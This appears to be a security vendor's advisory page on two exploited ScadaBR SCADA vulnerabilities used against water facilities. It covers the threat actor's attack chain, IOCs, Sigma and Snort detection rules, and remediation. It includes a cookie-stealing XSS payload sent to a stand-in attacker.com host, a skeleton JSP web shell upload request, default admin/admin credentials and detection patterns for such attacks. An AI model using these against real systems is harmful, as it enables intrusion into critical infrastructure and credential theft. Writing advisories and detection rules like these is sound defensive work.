OpenPLC ScadaBR Vulnerabilities
CVE-2021-26828 (RCE) & CVE-2021-26829 (XSS) — ICS/SCADA Under Active Hacktivist Attack
ACTIVE ICS/SCADA EXPLOITATION
TwoNet Pro-Russian Hacktivist GroupThe TwoNet hacktivist group is actively exploiting these vulnerabilities against water treatment facilities and critical infrastructure. Both CVEs have been added to the CISA Known Exploited Vulnerabilities catalog with mandatory remediation deadlines for federal agencies.
Attackers combine default ScadaBR credentials with CVE-2021-26828 to deploy JSP web shells, enabling remote command execution on ICS systems.
Download Full ICS Vulnerability Advisory
Complete technical analysis including IOCs, detection queries, network indicators, and step-by-step remediation guidance for OT environments.
Download PDF — FreeReport ID: INT-VA-2025-OPENPLC-SCADABR • TLP:CLEAR
Executive Summary
- Both CVEs added to CISA Known Exploited Vulnerabilities catalog
- Active exploitation by TwoNet pro-Russian hacktivist group
- Water treatment facilities confirmed as targets
- CISA deadlines: December 19, 2025 (XSS) and December 24, 2025 (RCE)
- Patches available since June 2021 — many ICS systems remain unpatched
OpenPLC ScadaBR is an open-source SCADA (Supervisory Control and Data Acquisition) Human-Machine Interface (HMI) system used in industrial control environments. Two vulnerabilities patched over three years ago are now being actively exploited against water treatment facilities by the pro-Russian hacktivist group TwoNet.
Vulnerability Overview
| CVE ID | Type | CVSS | CWE | Exploitability |
|---|---|---|---|---|
| CVE-2021-26828 | Remote Code Execution | 8.8 High | CWE-434 | Actively Exploited |
| CVE-2021-26829 | Stored XSS | 5.4 Medium | CWE-79 | Actively Exploited |
Why This Matters
Industrial control systems, particularly those managing water treatment and distribution, represent critical infrastructure that directly impacts public health and safety. The exploitation of these vulnerabilities by hacktivist groups demonstrates:
- Prolonged vulnerability window — ICS/OT systems often lag years behind in patching
- Low barrier to entry — Default credentials combined with known exploits enable unsophisticated attackers
- Cross-sector risk — ScadaBR deployments exist across water, energy, and manufacturing sectors
- Geopolitical targeting — Pro-Russian hacktivists specifically targeting Western infrastructure
Threat Actor: TwoNet
TwoNet
TwoNet is a pro-Russian hacktivist group that has emerged as a significant threat to operational technology (OT) and industrial control systems, particularly in the water sector. The group has been observed targeting SCADA systems in Western countries as part of broader geopolitical operations.
Attack Methodology
TwoNet's attack pattern against ScadaBR systems follows a predictable chain:
- Reconnaissance — Identify internet-exposed ScadaBR instances using Shodan, Censys, or similar tools
- Initial Access — Authenticate using default ScadaBR credentials (
admin/admin) - Exploitation — Upload malicious JSP web shell via CVE-2021-26828
- Post-Exploitation — Execute commands, modify SCADA configurations, or deploy additional payloads
TwoNet operates in coordination with other pro-Russian hacktivist groups targeting ICS infrastructure. See our Z-Pentest Threat Profile for related ICS targeting activity.
Affected Products
The vulnerabilities affect ScadaBR installations on both Linux and Windows platforms. Due to the nature of ICS/OT environments, many systems have not been updated since the patches were released in June 2021.
CVE-2021-26828 — Remote Code Execution
| Product | Platform | Vulnerable Versions | Fixed Version | Status |
|---|---|---|---|---|
| ScadaBR | Linux | < 0.9.1 | 0.9.1+ | Exploited |
CVE-2021-26829 — Stored Cross-Site Scripting
| Product | Platform | Vulnerable Versions | Fixed Version | Status |
|---|---|---|---|---|
| ScadaBR | Windows | < 1.12.4 | 1.12.4+ | Exploited |
Industrial control systems often operate on isolated networks with infrequent maintenance windows. Organizations should assess their ScadaBR deployments and prioritize patching based on network exposure and criticality.
Technical Analysis
CVE-2021-26828: Arbitrary File Upload (RCE)
This vulnerability exists in the upload functionality where ScadaBR allows authenticated users to upload files. Due to insufficient validation, attackers can upload JSP web shells that are then executed by the underlying Tomcat server.
Exploitation Chain — CVE-2021-26828
Vulnerable Upload Endpoint
POST /ScadaBR/upload.shtm HTTP/1.1 Host: [target] Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="file"; filename="shell.jsp" Content-Type: application/octet-stream [JSP web shell content] ------WebKitFormBoundary--
CVE-2021-26829: Stored Cross-Site Scripting
This vulnerability allows authenticated attackers to inject malicious JavaScript into ScadaBR that executes when other users view the affected page. This can be leveraged for credential theft or privilege escalation.
Exploitation Chain — CVE-2021-26829
Example XSS Payload
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
Combined Attack Scenario
In observed attacks, TwoNet combines both vulnerabilities:
- Initial foothold — Use XSS to steal valid operator credentials
- Privilege escalation — Authenticate with stolen admin credentials
- Code execution — Upload JSP web shell via CVE-2021-26828
- Persistence — Maintain access to SCADA environment for future operations
Detection
Indicators of Compromise (IOCs)
Network Indicators
| Type | Indicator | Description |
|---|---|---|
| IP Address | 45.157.234[.]199 | TwoNet C2 Infrastructure |
| IP Address | 45.14.247[.]87 | TwoNet C2 Infrastructure |
File Indicators
| Type | Indicator | Description |
|---|---|---|
| File Path | /ScadaBR/uploads/*.jsp | Web shell upload location |
| File Extension | .jsp, .jspx | Suspicious uploads in ScadaBR |
| User Agent | python-requests/* | Automated exploitation tools |
Web Server Log Patterns
# JSP file upload attempts POST /ScadaBR/upload.shtm.*\.jsp # Uploaded shell access GET /ScadaBR/uploads/.*\.jsp # Default credential authentication POST /ScadaBR/login.htm.*admin # XSS payload injection .*<script>.*document\.cookie.*
Detection Rules
Sigma Rule — JSP Upload Detection
title: ScadaBR JSP Web Shell Upload Attempt
id: 8a2c5f91-4b3d-4e6a-9f8c-1a2b3c4d5e6f
status: experimental
description: Detects attempts to upload JSP files to ScadaBR
logsource:
category: webserver
product: apache
detection:
selection:
cs-uri-stem|contains: '/ScadaBR/upload'
cs-method: 'POST'
filter_jsp:
cs-uri-query|contains:
- '.jsp'
- '.jspx'
condition: selection and filter_jsp
level: high
tags:
- attack.initial_access
- attack.t1190
- cve.2021.26828
Snort/Suricata Rule
alert http any any -> any any (
msg:"INTRUVENT - ScadaBR JSP Upload CVE-2021-26828";
flow:established,to_server;
http.method; content:"POST";
http.uri; content:"/ScadaBR/upload";
file.data; content:".jsp";
classtype:web-application-attack;
sid:2025002;
rev:1;
)
alert http any any -> any any (
msg:"INTRUVENT - ScadaBR Web Shell Access Attempt";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/ScadaBR/uploads/"; content:".jsp";
classtype:web-application-attack;
sid:2025003;
rev:1;
)
Monitor ICS/SCADA Threats with BRACE
BRACE provides specialized detection for OT/ICS attacks including:
- ScadaBR web shell upload and access attempts
- TwoNet infrastructure IOC correlation
- CISA KEV vulnerability exploitation patterns
- Hacktivist activity targeting critical infrastructure
Remediation
- CVE-2021-26829 (XSS) — December 19, 2025
- CVE-2021-26828 (RCE) — December 24, 2025
Federal agencies are required to apply patches by these dates. All organizations should prioritize remediation immediately.
Patch Information
| CVE | Platform | Fixed Version | Action |
|---|---|---|---|
| CVE-2021-26828 | Linux | ScadaBR 0.9.1+ | Upgrade immediately |
| CVE-2021-26829 | Windows | ScadaBR 1.12.4+ | Upgrade immediately |
Immediate Actions
- Change default credentials — Replace
admin/adminwith strong, unique passwords - Network segmentation — Ensure ScadaBR is not exposed to the internet
- Audit uploaded files — Review
/ScadaBR/uploads/directory for .jsp files - Apply patches — Upgrade to fixed versions (0.9.1+ Linux, 1.12.4+ Windows)
- Enable logging — Ensure web server access logs capture upload and authentication events
Network Segmentation Recommendations
- Firewall rules — Block all inbound internet traffic to ScadaBR systems
- DMZ architecture — Place SCADA HMI systems in isolated network segments
- VPN requirements — Require VPN for any remote access to OT networks
- Monitoring — Deploy IDS/IPS at OT network boundaries
- Allowlisting — Restrict upload file types to essential formats only
Forensic Investigation Steps
If compromise is suspected, perform the following analysis:
- Review web server access logs for upload activity to
/ScadaBR/upload.shtm - Search for .jsp files in ScadaBR directories that were not part of the original installation
- Analyze authentication logs for default credential usage or brute-force attempts
- Check for connections to known TwoNet infrastructure (45.157.234[.]199, 45.14.247[.]87)
- Preserve and analyze any identified web shells for IOC extraction
Get the Complete ICS Advisory
Download the full technical report including detailed IOCs, additional detection queries, and comprehensive remediation checklists for OT environments.
Download Full Report (PDF)Protect Your Critical Infrastructure
BRACE monitors for exploitation of ICS/SCADA vulnerabilities and hacktivist activity targeting operational technology environments.